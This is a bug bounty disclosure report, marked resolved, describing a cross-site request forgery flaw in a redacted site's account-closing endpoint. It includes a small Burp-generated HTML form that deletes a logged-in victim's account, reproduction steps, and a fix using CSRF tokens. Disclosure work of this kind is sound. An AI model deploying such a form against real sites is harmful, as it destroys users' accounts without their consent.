CSRF - Close Account
Medium
Vulnerability Details
**Target URL**
████/services/user/closeAccount
**Summary:**
Hello, I found a Cross-Site Request Forgery bug in the target endpoint on the POST request `/█████/services/user/closeAccount`, which is critical because it can delete an authenticated user's account whenever they navigate to the attacker's website or link.
## Step-by-step Reproduction Instructions
1. Navigate to your account █████████/#/login.
2. Copy and paste the code below into an HTML file:
```html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="████████/services/user/closeAccount" method="POST">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
3. Open it in the browser, hit the button, and your account will be closed.
Please see the attached video for a clear PoC.
████████
## Suggested Mitigation/Remediation Actions
Add a CSRF token in a request header or in a hidden form input, and verify it server-side, so the server can check whether the user performing this action actually authorized it or not.
## Impact
This action is critical and sensitive. An attacker can host this file at a URL and send it to victims; when authenticated victims navigate to the URL, their accounts will be deleted.
## Report Stats
- Report ID: 856518
- State: Closed
- Substate: resolved
- Upvotes: 20